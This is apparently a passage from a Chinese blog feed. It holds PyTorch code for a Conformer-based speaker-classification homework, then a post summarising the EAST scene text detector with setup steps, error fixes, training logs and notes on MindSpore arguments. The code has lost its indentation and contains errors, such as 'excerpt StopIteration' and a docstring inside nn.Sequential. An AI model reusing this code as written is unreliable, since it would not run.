    # Because we train the model batch by batch, we need to pad the features in the same batch to make their lengths the same.
    mel = pad_sequence(mel, batch_first=True, padding_value=-20) # pad log 10^(-20) which is very small value.
    # mel: (batch size, length, 40)
    return mel, torch.FloatTensor(speaker).long()


    def get_dataloader(data_dir, batch_size, n_workers):
    """
    Generate dataloader
    data_dir:数据集路径
    batch_size:batch 大小
    n_workers:读取数据的线程数
    """
    dataset = myDataset(data_dir)
    speaker_num = dataset.get_speaker_number()
    # 分割数据
    trainlen = int(0.9 * len(dataset))
    lengths = [trainlen, len(dataset) - trainlen]
    trainset, validset = random_split(dataset, lengths)

    train_loader = DataLoader(
    trainset, # 数据集
    batch_size=batch_size, # 每个 batch 的大小
    shuffle=True, #traindata 随机排序
    num_workers=n_workers, # 加载数据时所使用的 CPU 线程数
    drop_last=True, # 如果最后一个 batch 的样本数小于 batch_size,则丢弃该 batch
    pin_memory=True, # 将内存固定到 GPU 上,加快数据传输
    collate_fn=collate_batch, # 对每个 batch 中的数据进行批处理和填充,具体实现由 collate_batch 函数完成
    )
    valid_loader = DataLoader(
    validset,
    batch_size=batch_size,
    num_workers=n_workers,
    drop_last=True,
    pin_memory=True,
    collate_fn=collate_batch,
    )

    return train_loader, valid_loader, speaker_num
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    # --- Model ---
    !pip install conformer
    import torch
    import torch.nn as nn
    import torch.nn.functional as F
    from conformer import ConformerBlock

    class Classifier(nn.Module):
    def __init__(self, d_model=256, n_spks=600, dropout=0.2):
    '''
    该模型是一个语音分类器,用于将语音信号分为不同的说话人。
    其中,d_model 表示特征维度,n_spks 表示说话人的数量,dropout 表示 dropout 概率。
    '''
    super().__init__()
    # input -> d_model
    '''
    Prenet:通过一个全连接层对输入的 mel 音频特征进行转换,将 40 维的 mel 特征转化为 d_model 维的表示。
    '''
    self.prenet = nn.Linear(40, d_model)

    # self.encoder_layer = nn.TransformerEncoderLayer(
    # d_model=d_model, dim_feedforward=256, nhead=2
    # )
    # self.encoder = nn.TransformerEncoder(self.encoder_layer, num_layers=2)
    # transformer 不行,不如 conformer
    '''
    Encoder:使用 ConformerBlock 实现的编码器,将 Prenet 输出的 mel 音频特征序列编码成固定长度的向量,以便进行分类。
    该编码器在多头 self-attention 机制的基础上,结合了深度可分离卷积,使用多层非线性变换对输入进行处理,提取更加抽象的特征表示。
    '''
    self.encoder=ConformerBlock(
    dim=d_model,
    dim_head=4,
    heads=4, # attension 层头数?
    ff_mult=4, # 在 feed forward network 作为乘数的参数
    conv_expansion_factor=2, #在卷积层中作成乘数的参数
    conv_kernel_size=20,
    attn_dropout=dropout, # attendsion 层
    ff_dropout=dropout, # feed forward 层
    conv_dropout=dropout # 卷积层
    )
    # Project the the dimension of features from d_model into speaker nums.
    # 将 d_model 中的特征尺寸投影到 speaker 的编号中。
    self.pred_layer = nn.Sequential(
    '''
    Pred_layer:用于预测说话人标签的全连接神经网络
    '''
    nn.BatchNorm1d(d_model), # 对小批量 e2d 或 3d 输入进行批标准化
    nn.Linear(d_model, d_model), # 过两层全连接层将其映射到 n_spks 维的向量
    nn.Sigmoid(), # 通过 sigmoid 函数将每个维度的值限制在 [0, 1] 范围内
    nn.Linear(d_model, n_spks), # 最后一层采用线性变换输出分类结果
    )

    def forward(self, mels):
    """
    args:
    mels: (batch size, length, 40)
    return:
    out: (batch size, n_spks)
    """
    # out: (batch size, length, d_model)
    '''
    在前向传播过程中,首先将输入的 mels 序列通过 Prenet 层进行特征转换,
    得到一个形状为 (batch size, length, d_model) 的张量 out,其中 d_model 表示特征维度
    '''
    out = self.prenet(mels) # 先上到 d_model
    # out: (length, batch size, d_model)
    '''
    通过调用 out.permute(1, 0, 2) 将其第一维和第二维交换位置,变成形状为 (length, batch size, d_model) 的张量,
    以符合编码器 ConformerBlock 对输入的要求
    '''
    out = out.permute(1, 0, 2) # 变形
    # The encoder layer expect features in the shape of (length, batch size, d_model).
    '''
    将 out 作为编码器的输出传入 self.encoder 中,得到一个 shape 为 (length, batch size, d_model) 的张量 out
    这里使用的是 ConformerBlock 编码器,它采用了改进的 Transformer 结构,
    在原有的自注意力机制的基础上加入了深度可分离卷积以及位置相关的 Feed-Forward 结构,能够更好地捕捉语音信号的时序特征。
    '''
    out = self.encoder(out) # encoder 就得酱紫,怪捏
    # out: (batch size, length, d_model)
    '''
    将 out 再次变形,将其第一维和第二维交换回来形成一个 shape 为 (batch size, length, d_model) 的张量
    '''
    out = out.transpose(0, 1) # 再变形
    # mean pooling
    '''
    对该张量沿着第一维做 mean pooling 操作,
    生成一个 shape 为 (batch size, d_model) 的统计量 stats,代表了该批次中每个音频序列的平均特征向量
    '''
    stats = out.mean(dim=1) # 取第 1 维的平均

    # out: (batch, n_spks)
    '''
    将 stats 作为输入传入全连接神经网络模型 self.pred_layer,得到一个 (batch size, n_spks) 维的输出向量 out,
    其中 n_spks 表示说话人数量。该输出向量表示每个音频序列属于不同说话人的概率分布情况。
    '''
    out = self.pred_layer(stats)
    return out
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    import math

    import torch
    from torch.optim import Optimizer
    from torch.optim.lr_scheduler import LambdaLR #注意这玩意

    ##学习率调整计划
    def get_cosine_schedule_with_warmup(
    optimizer: Optimizer, # 需要进行学习率调度的优化器对象。
    num_warmup_steps: int, # 学习率预热期的步长,也就是训练前需要逐步提高学习率的迭代次数。
    num_training_steps: int, # 训练总步长,也就是整个训练过程中的总迭代次数。
    num_cycles: float = 0.5, # 余弦函数波形的周期数量,默认值为 0.5,表示每个周期内有一个完整的余弦波形变化。
    last_epoch: int = -1, # 可选参数,可以指定学习率调度器在开始训练时的起始 epoch 值。
    ):
    def lr_lambda(current_step):
    '''
    函数内部采用了一个嵌套函数 lr_lambda,其输入为当前训练的步数 current_step。
    这个函数首先对前 num_warmup_steps 步采用线性递增的方式来提高学习率(因为在训练初期往往需要更小的学习率以避免模型梯度爆炸或消失)。
    '''
    # Warmup
    '''
    首先对前 num_warmup_steps 步采用线性递增的方式来提高学习率(因为在训练初期往往需要更小的学习率以避免模型梯度爆炸或消失)
    '''
    if current_step < num_warmup_steps:
    return float(current_step) / float(max(1, num_warmup_steps))
    # decadence
    '''
    在剩余的 num_training_steps 步中,学习率会随着训练步数的增加而不断地逐渐下降。
    '''
    progress = float(current_step - num_warmup_steps) / float(
    max(1, num_training_steps - num_warmup_steps)
    )
    return max(
    0.0, 0.5 * (1.0 + math.cos(math.pi * float(num_cycles) * 2.0 * progress))
    )
    '''
    将 lr_lambda 函数和相关参数使用 LambdaLR 类进行包装,并返回该实例对象供模型训练过程中进行学习率的调度。
    '''
    return LambdaLR(optimizer,lr_lambda,last_epoch)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    # 训练部分
    import torch

    def model_fn(batch, model, criterion, device):
    """Forward a batch through the model."""
    # model.train()
    # 拿数据环节
    mels, labels = batch
    mels = mels.to(device)
    labels = labels.to(device)
    # 求损失环节
    outs = model(mels)
    loss = criterion(outs, labels)
    # 返回概率最高的 speakerID
    preds = outs.argmax(1)
    # 求准确率
    accuracy = torch.mean((preds == labels).float())

    return loss, accuracy
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    # 验证部分
    from tqdm import tqdm
    import torch


    def valid(dataloader, model, criterion, device):
    """Validate on validation set."""

    model.eval()
    running_loss = 0.0
    running_accuracy = 0.0
    pbar = tqdm(total=len(dataloader.dataset), ncols=0, desc="Valid", unit=" uttr")

    for i, batch in enumerate(dataloader):
    with torch.no_grad():
    loss, accuracy = model_fn(batch, model, criterion, device)
    running_loss += loss.item()
    running_accuracy += accuracy.item()

    pbar.update(dataloader.batch_size)
    pbar.set_postfix(
    loss=f"{running_loss / (i+1):.2f}",
    accuracy=f"{running_accuracy / (i+1):.2f}",
    )

    pbar.close()
    model.train()

    return running_accuracy / len(dataloader)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    from tqdm import tqdm
    import torch
    import torch.nn as nn
    from torch.optim import AdamW
    from torch.utils.data import DataLoader, random_split


    def parse_args():
    # 设定超参数
    config = {
    "data_dir": "/kaggle/input/ml2023springhw4/Dataset",
    "save_path": "/kaggle/working/model.ckpt",
    "batch_size": 32,
    "n_workers": 8,
    "valid_steps": 2000,
    "warmup_steps": 1000,
    "save_steps": 10000,
    "total_steps": 70000,
    }

    return config


    def main(
    data_dir,
    save_path,
    batch_size,
    n_workers,
    valid_steps,
    warmup_steps,
    total_steps,
    save_steps,
    ):
    """Main function."""
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    print(f"[Info]: Use {device} now!")

    train_loader, valid_loader, speaker_num = get_dataloader(data_dir, batch_size, n_workers)
    train_iterator = iter(train_loader)
    print(f"[Info]: Finish loading data!",flush = True)

    # 定义模型
    model = Classifier(n_spks=speaker_num).to(device)
    # 定义损失函数
    criterion = nn.CrossEntropyLoss()
    # 定义优化器
    optimizer = AdamW(model.parameters(), lr=1e-3)
    # 对优化器的学习率进行调整
    scheduler = get_cosine_schedule_with_warmup(optimizer, warmup_steps, total_steps)
    print(f"[Info]: Finish creating model!",flush = True)

    model.load_state_dict(torch.load(f"/kaggle/input/hw4model3/model (3).ckpt"))

    best_accuracy = -1.0
    best_state_dict = None

    pbar = tqdm(total=valid_steps, ncols=0, desc="Train", unit=" step")
    torch.save(best_state_dict, save_path)
    for step in range(total_steps):
    # Get data
    try:
    batch = next(train_iterator)
    excerpt StopIteration:
    train_iterator = iter(train_loader)
    batch = next(train_iterator)

    loss, accuracy = model_fn(batch, model, criterion, device)
    batch_loss = loss.item()
    batch_accuracy = accuracy.item()

    # Updata model
    loss.backward()
    optimizer.step()
    scheduler.step()
    optimizer.zero_grad()
    # Log
    pbar.update()
    pbar.set_postfix(
    loss=f"{batch_loss:.2f}",
    accuracy=f"{batch_accuracy:.2f}",
    step=step + 1,
    )

    # Do validation
    if (step + 1) % valid_steps == 0:
    pbar.close()

    valid_accuracy = valid(valid_loader, model, criterion, device)

    # keep the best model
    if valid_accuracy > best_accuracy:
    best_accuracy = valid_accuracy
    best_state_dict = model.state_dict()

    pbar = tqdm(total=valid_steps, ncols=0, desc="Train", unit=" step")

    # Save the best model so far.
    if (step + 1) % save_steps == 0 and best_state_dict is not None:
    torch.save(best_state_dict, save_path)
    pbar.write(f"Step {step + 1}, best model saved. (accuracy={best_accuracy:.4f})")

    pbar.close()


    if __name__ == "__main__":
    main(**parse_args())
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    import json
    import csv
    from pathlib import Path
    from tqdm.notebook import tqdm

    import torch
    from torch.utils.data import DataLoader

    def parse_args():
    """arguments"""
    config = {
    "data_dir": "/kaggle/input/ml2023springhw4/Dataset",
    "model_path": "/kaggle/working/model.ckpt",
    "output_path": "/kaggle/working/output.csv",
    }

    return config


    def main(
    data_dir,
    model_path,
    output_path,
    ):
    """Main function."""
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    print(f"[Info]: Use {device} now!")

    mapping_path = Path(data_dir) / "mapping.json"
    mapping = json.load(mapping_path.open())

    dataset = InferenceDataset(data_dir)
    dataloader = DataLoader(
    dataset,
    batch_size=1,
    shuffle=False,
    drop_last=False,
    num_workers=8,
    collate_fn=inference_collate_batch,
    )
    print(f"[Info]: Finish loading data!",flush = True)

    speaker_num = len(mapping["id2speaker"])
    model = Classifier(n_spks=speaker_num).to(device)
    model.load_state_dict(torch.load(model_path))
    model.eval()
    print(f"[Info]: Finish creating model!",flush = True)

    results = [["Id", "Category"]]
    for feat_paths, mels in tqdm(dataloader):
    with torch.no_grad():
    mels = mels.to(device)
    outs = model(mels)
    preds = outs.argmax(1).cpu().numpy()
    for feat_path, pred in zip(feat_paths, preds):
    results.append([feat_path, mapping["id2speaker"][str(pred)]])

    with open(output_path, 'w', newline='') as csvfile:
    writer = csv.writer(csvfile)
    writer.writerows(results)


    if __name__ == "__main__":
    main(**parse_args())
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    # ---下面就是交数据啦—--
    import os
    import json
    import torch
    from pathlib import Path
    from torch.utils.data import Dataset


    class InferenceDataset(Dataset):
    def __init__(self, data_dir):
    testdata_path = Path(data_dir) / "testdata.json"
    metadata = json.load(testdata_path.open())
    self.data_dir = data_dir
    self.data = metadata["utterances"]

    def __len__(self):
    return len(self.data)

    def __getitem__(self, index):
    utterance = self.data[index]
    feat_path = utterance["feature_path"]
    mel = torch.load(os.path.join(self.data_dir, feat_path))

    return feat_path, mel


    def inference_collate_batch(batch):
    """Collate a batch of data."""
    feat_paths, mels = zip(*batch)

    return feat_paths, torch.stack(mels)

    ]]>
    @@ -6819,7 +6819,7 @@ /posts/Paper-EAST-An%20Efficient%20and%20Accurate%20Scene%20Text%20Detector/ - 资源

    正文

    ​ 我们这个模型使用单个神经网络直接预测完整图像中的任意方向和四边形的单词或文本行,消除了不必要的中间步骤(如候选聚合和单词划分)。我们的模型在 ICDAR 2015COCO TextMSRA-TD500 中都非常好使!


    ​ 文本检测作为后续过程的先决条件,核心是设计特征来区分文本和背景。

    ​ 提出了一个快速准确的场景文本检测流水线,使用一个**完全卷积神经网络(FCN)模型,产生单词或文本行级别的预测,排除了冗余和缓慢的中间步骤。生成的文本预测可以是旋转的矩形或四边形,将被发送到非最大抑制(Non-Maximum Suppression,NMS)**以产生最终结果。


    EAST, since it is an Efficient and Accuracy Scene Text detection pipeline.

    png

    • Feature extractor
      stem,特征提取炳(PVANet)

      • 主干可以是在 ImageNet 数据集上预先训练的卷积网络,具有交错的卷积和池化层。从干提取四个级别的特征图,表示为 $f_i$,其大小分别为输入图像的 $\frac{1}{32},\frac{1}{16},\frac{1}{8}$ 和 $\frac{1}{4}$。
    • Feature-merging
      branch,特征合并分支

      • 逐渐将它们合并(concat):

        $g_i=\left{\begin{matrix}\mathrm{unpool}(h_i) & \mathrm{if} & i\le3 \ \mathrm{conv}_{3\times3}(h_i) & \mathrm{if} & i=4\end{matrix}\right.$

        $h_i=\left{\begin{matrix}f_i & \mathrm{if}\ i=1\\mathrm{conv}{3\times3}(\mathrm{conv{1\times1}}([g_{i-1};f_i])) & \mathrm{otherwise}\end{matrix}\right.$

        • $g_i$ 是合并基数

        • $h_i$ 是合并后的特征图

        • 运算符 $[·;·]$ 表示沿通道轴的串联

      • 在每个合并阶段,来自最后一个阶段的特征图首先被馈送到 unpool 层以使其大小加倍,然后与当前特征图连接。

      • $\mathrm{conv}_{1×1}$ 减少了通道数量并减少了计算

      • $\mathrm{conv}_{3\times3}$ 融合了信息,最终产生了这个合并阶段的输出

      • 在最后一个合并阶段之后,$\mathrm{conv}_{3\times3}$ 层生成合并分支的最终特征图,并将其提供给输出层。

    • Output layer,输出层

      • 对文本区域的两种几何形状进行实验:

        • 旋转框(RBOX)
          • 4 个轴对齐边界框(AABB)$\mathbf R$
          • 1 个通道旋转角度 $\theta$
        • 四边形(QUAD)
          • 使用 8 个数字来表示从四边形的四个角顶点 ${p_i|i\in{1,2,3,4}}$ 到像素位置的坐标偏移,由于每个距离偏移包含两个数字 $(\Delta x_i,\Delta y_i)$,几何输出包含 8 个通道。
    • 为每种几何形状设计了不同的损失函数:

      • $L=L_s+\lambda_gL_g$

        • $L_s$ 表示分数图的损失,$L_{s}=\mathrm{balanced-xent}(\hat{\mathbf{Y}},\mathbf{Y}{*})=-\beta\mathbf{Y}{}\log\hat{\mathbf{Y}}-(1-\beta)(1-\mathbf{Y}^{})\log(1-\hat{\mathbf{Y}})$

          • $\hat{\mathbf{Y}}=F_s$ 是分数图的预测
            • $\mathbf Y^*$ 是 ground truth
            • $\beta$ 是正样本和负样本之间的平衡因子,$\beta=1-\frac{\sum_{y^\in\mathbf Y*}y}{|\mathbf Y^*|}$
        • $L_g$ 表示几何图形的损失,直接用 $L_1$ 或 $L_2$ 将引导损失偏向于更大和更长的文本区域。

          • 在 RBOX 回归:$L_g=L_{AABB}+\lambda_\theta L_{\theta}$,$\lambda_\theta$ 取 10

            • AABB 部分采用 IoU 损失:$L_{AABB}=-\log\mathrm{IoU}(\hat{\mathbf{R}},\mathbf R^)=-\log\frac{|\mathbf{R}\cap \mathbf R^|}{|\mathbf{R}\cup \mathbf R^*|}$

            • 旋转角度损失:$L_\theta(\hat\theta,\theta*)=1-\cos(\hat\theta-\theta*)$

          • 在 QUAD 回归中采用尺度归一化平滑 $L_1$ 损失:$L_g=L_{QUAD}(\hat{\mathbf{Q}},\mathbf Q^*)$

        • $\lambda_g$ 表示两个损失之间的重要性,设为 1。

    • 包含几个 $\mathrm{conv}_{1×1}$ 操作,将 32 个通道的特征图投影到 1 个通道的分数图 $F_s$ 和一个多通道的几何图 $F_g$ 中。几何输出可以是 RBOX 或 QUAD 中的一个

    ​ 将阈值应用于每个预测区域,其中得分超过预定义阈值的几何体被认为是有效的,并保存以供以后进行非最大值抑制。NMS 之后的结果被认为是管道的最终输出。ADAM 优化器,batch=24。


    ​ NMS:在假设附近像素的几何图形往往高度相关的情况下,我们建议逐行合并几何图形,在合并同一行中的几何图形时,我们将迭代合并当前遇到的几何图形和最后合并的几何图形。这种改进的技术在最佳场景中在 $O(n)$ 中运行。尽管它的最坏情况与原始情况相同,但只要局部性假设成立,该算法在实践中运行得足够快。


    未来研究的可能方向包括:

    • 调整几何公式,以允许直接检测弯曲文本;
    • 将所述检测器与文本识别器集成;
    • 将该思想扩展到通用对象检测。

    代码

    Pytorch

    Windows

    1. SakuraRiven/EAST: PyTorch Re-Implementation of EAST: An Efficient and Accurate Scene Text Detector (github.com) 加载仓库:

    png

    加载工程文件
    1. conda 中新建一个 EAST 环境(conda create -n east python=3.7)并安装好:

      • pytorch
      • shapely
      • opencv-python 4.0.0.21
      • lanms,巨难装,用 pip install lanms-neo==1.0.2 -i https://pypi.tuna.tsinghua.edu.cn/simple
        • 如果是 wsl2 的 ubuntu, pip install lanms-proper

      设置好解释器

    png

    设置解释器
    1. 下载模型:VGG16EAST,将它们放在 pths/ 文件夹中

    png

    下载并放置预训练好的模型
    1. Downloads - Incidental Scene Text - Robust Reading Competition (uab.es) 下载好 ICDAR 2015 Challenge 4 数据集,解压并按规则放在对应的文件夹中(原项目想放到工程外面,我改到了工程里面)

    png

    数据集官网

    png

    下载出这么四个压缩包

    png

    设置数据集地址

    png

    修改路径
    1. 开跑 detect.py

    png

    预测结果
    1. 开跑 train.py!喜提错误:UnicodeDecodeError: ‘gbk’ codec can’t decode byte 0xbf in position 2: illegal multibyte sequence!在 dataset.py 中的第 382 行 with open(self.gt_files[index], 'r') as f: 改成 with open(self.gt_files[index], 'r', encoding='utf-8') as f: 填之。

    2. 开跑 train.py!喜提错误:torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 1.50 GiB (GPU 0; 8.00 GiB total capacity; 3.14 GiB already allocated; 2.79 GiB free; 3.15 GiB reserved in total by PyTorch) If reserved memory is >> allocated memory try setting max_split_size_mb to avoid fragmentation. See documentation for Memory Management and PYTORCH_CUDA_ALLOC_CONF!在train.py 里把 batch_size = 24 改成 batch_size = 4 填之。

    3. 开跑 train.py!能跑了!

    WSL2

    装好环境

    conda create -n EAST python=3.7
    conda activate EAST
    pip install shapely
    pip install opencv-python==4.0.0.21
    pip install lanms-proper

    开跑!

    python3 train.py

    喜提错误:

      File "/home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/cv2/__init__.py", line 3, in <module>
    from .cv2 import *
    ImportError: libSM.so.6: cannot open shared object file: No such file or directory

    填:

    sudo apt update
    sudo apt install libsm6

    喜提错误:

    Could not load library libcudnn_cnn_infer.so.8. Error: libcuda.so: cannot open shared object file: No such file or directory
    Please make sure libcudnn_cnn_infer.so.8 is in your library path!

    安装 CUDNN:

    sudo apt install nvidia-cuda-toolkit

    开跑!

    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/torch/optim/lr_scheduler.py:143: UserWarning: Detected call of `lr_scheduler.step()` before `optimizer.step()`. In PyTorch 1.1.0 and later, you should call them in the opposite order: `optimizer.step()` before `lr_scheduler.step()`.  Failure to do this will result in PyTorch skipping the first value of the learning rate schedule. See more details at https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate
    "https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate", UserWarning)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    classify loss is 0.98071122, angle loss is 0.68633509, iou loss is 5.08373260
    Epoch is [1/600], mini-batch is [1/250], time consumption is 8.06183171, batch_loss is 12.92779446
    classify loss is 0.99145019, angle loss is 0.75015461, iou loss is 4.81786251
    Epoch is [1/600], mini-batch is [2/250], time consumption is 0.21901011, batch_loss is 13.31085873
    classify loss is 0.99974638, angle loss is 0.74429435, iou loss is 5.48675823
    Epoch is [1/600], mini-batch is [3/250], time consumption is 0.21214652, batch_loss is 13.92944813
    classify loss is 0.99397326, angle loss is 0.60727608, iou loss is 3.27876091
    Epoch is [1/600], mini-batch is [4/250], time consumption is 0.22212124, batch_loss is 10.34549522
    classify loss is 0.99331516, angle loss is 0.67070889, iou loss is 3.67775035
    Epoch is [1/600], mini-batch is [5/250], time consumption is 0.23853326, batch_loss is 11.37815380
    classify loss is 0.98511696, angle loss is 0.73328424, iou loss is 3.17167139
    Epoch is [1/600], mini-batch is [6/250], time consumption is 0.20371103, batch_loss is 11.48963070
    classify loss is 0.99793059, angle loss is 0.60213274, iou loss is 4.67736626
    ...

    MindSpore

    读代码

    train.py

    好像跟其他的train.py差不多,设置完各种参数然后加载模型和优化器,开跑!

    各种细节都在src/里。

    from src.util import AverageMeter, get_param_groups
    from src.east import EAST, EastWithLossCell
    from src.logger import get_logger
    from src.initializer import default_recurisive_init
    from src.dataset import create_east_dataset
    from src.lr_scheduler import get_lr

    这段代码主要是对所需的模块进行引用,包括平均数计算、网络参数获取、EAST 模型、损失函数、日志记录、参数初始化、EAST 数据集和学习率调度器。

    首先,从src.util模块中引入AverageMeter()get_param_groups()方法,分别用于计算平均数和获取网络中需要训练的参数。

    接着,从src.east模块中引入EAST类和EastWithLossCell类,分别表示 EAST 模型和组合了损失函数的 EAST 模型。

    然后,从src.logger模块中引入get_logger()方法,用于获取日志记录器。

    接下来,从src.initializer模块中引入default_recursive_init()方法,用于对 EAST 模型进行默认的递归初始化。

    再者,从src.dataset模块中引入create_east_dataset()方法,用于创建 EAST 数据集。

    最后,从src.lr_scheduler模块中引入get_lr()方法,用于获取当前 epoch 的学习率。

    1. 设置 Parser 变量

    2. 设置分布式计算参数

    3. 设置 ModelArts 相关参数

    4. 设置相关路径(数据集、日志输出地址)

    5. 代码加速优化相关

    6. 加载模型

    7. 设置优化器

    8. 开始训练


    ​ 先使用 Argparse 模块创建一个 ArgumentParser 对象,用于解析命令行参数。

    ArgumentParser('mindspore icdar training'):创建一个 ArgumentParser 对象,并把 'mindspore icdar training' 作为参数传入,即设置程序的描述信息为 mindspore icdar training

    Parser 变量

    设备相关:

    nametypedefaulthelp
    –device_targetstrAscenddevice where the code will be implemented.
    –device_idint0device id where the model will be implemented.

    数据集相关:

    nametypedefaulthelp
    –data_dirstr‘./data/icdar2015/Training/’Train dataset directory.
    –per_batch_sizeint8Batch size for Training.
    –outputs_dirstr‘outputs/’output dir.

    神经网络相关:

    nametypedefaulthelp
    –pretrained_backbonestr‘./data/vgg/XXX.ckpt’The ckpt file of ResNet.
    –resume_eaststrThe ckpt file of EAST, which used to fine tune. (模型微调)

    优化器学习率相关:

    nametypedefaulthelp
    –lr_schedulerstr‘my_lr’Learning rate scheduler(学习率调整策略), options: exponential(指数衰减), cosine_annealing(余弦退火). Default: cosine_annealing
    –lrfloat0.001Learning rate.
    –per_stepfloat2Learning rate change times.
    –lr_gammafloat0.1Decrease lr by a factor of exponential lr_scheduler.(将 lr 减少指数 lr_scheduler系数)
    –eta_minfloat0.Eta_min in cosine_annealing scheduler.
    –t_maxint100T-max in cosine_annealing scheduler.
    –max_epochint600Max epoch num to train the model.
    –warmup_epochsfloat(?)6Warmup epochs.
    –weight_decayfloat0.0005Weight decay factor.

    损失函数相关:

    nametypedefaulthelp
    –loss_scaleint1Static loss scale.(静态损失标度)
    –resume_eaststr7,7Epoch of changing of lr changing, split with “,”(改变 lr 的 epoch 变化,用 “,” 拆分)

    日志相关:

    nametypedefaulthelp
    –log_intervalint10Logging interval steps.(记录间隔步骤)
    –ckpt_pathstr‘outputs/’Checkpoint save location.
    –ckpt_intervalint1000(太大了吧,牛逼)Save checkpoint interval.(保存检查点间隔)
    –is_save_on_masterint1Save ckpt on master or all rank, 1 for master, 0 for all ranks.(这个 master 和 rank 应该跟分布式计算有关)

    分布式计算相关:

    nametypedefaulthelp
    –is_distributedint0Distribute train or not, 1 for yes, 0 for no.
    –rankint0Local rank of distributed.
    –group_sizeint1World size of device.

    **profiler(性能分析器)**相关:

    nametypedefaulthelp
    –need_profilerint0Whether use profiler. 0 for no, 1 for yes.

    modelArts相关:

    nametypedefaulthelp
    –is_modelArtsint0Trainning in modelArts or not, 1 for yes, 0 for no.

    分布式计算

    这段代码主要是设置 Mindspore 的分布式计算的参数,我并不想动它。

    args, _ = parser.parse_known_args()
    args.device_id = int(os.getenv("DEVICE_ID", "0"))
    args.rank = args.device_id

    ms.set_context(mode=ms.GRAPH_MODE, device_target=args.device_target, device_id=args.device_id)
    if args.is_distributed:
    comm.init()
    args.rank = comm.get_rank()
    args.group_size = comm.get_group_size()
    ms.set_auto_parallel_context(parallel_mode=ms.ParallelMode.DATA_PARALLEL, gradients_mean=True,
    device_num=args.group_size)

    ModelArts

    ModelArts 相关的参数,但是我把它设为 0 依然能跑?

    这段代码主要是用于处理在华为云ModelArts平台上运行时的数据和模型路径。

    首先判断args.is_modelArts是否为True,如果是,则意味着程序运行在华为云ModelArts平台上,需要对存储路径进行修改。

    接着,导入moxing库,这个库是华为云针对ModelArts平台的Python SDK,提供了丰富的API用于读写数据、上传下载文件等操作。

    然后,根据当前进程的编号(即args.rank变量)生成本地数据路径和本地模型路径,并将模型文件从远程路径(即args.pretrained_backbone)重命名为本地模型路径。

    接下来,使用mox.file.copy_parallel()方法将数据从远程路径(即args.data_dir)拷贝到本地数据路径。

    最后,将输出路径(即args.outputs_dir)设置为/cache目录下的子目录。在ModelArts平台上运行程序时,程序的输出也需要放在/cache目录下,以保证数据的持久化存储。

    if args.is_modelArts:
    import moxing as mox

    local_data_url = os.path.join('/cache/data', str(args.rank))
    local_ckpt_url = os.path.join('/cache/ckpt', str(args.rank))
    local_ckpt_url = os.path.join(local_ckpt_url, 'backbone.ckpt')

    mox.file.rename(args.pretrained_backbone, local_ckpt_url)
    args.pretrained_backbone = local_ckpt_url

    mox.file.copy_parallel(args.data_dir, local_data_url)
    args.data_dir = local_data_url

    args.outputs_dir = os.path.join('/cache', args.outputs_dir)

    相关路径

    设置相关路径(数据集、日志):

    args.data_root = os.path.abspath(os.path.join(args.data_dir, 'image'))
    args.txt_root = os.path.abspath(os.path.join(args.data_dir, 'groundTruth'))

    # 使用当前进程的编号(即 args.rank 变量)作为子目录名称,拼接成完整的输出文件夹路径
    outputs_dir = os.path.join(args.outputs_dir, str(args.rank))
    # 获取当前时间作为子目录名称,再次拼接成完整的输出文件夹路径
    args.outputs_dir = os.path.join(
    args.outputs_dir,
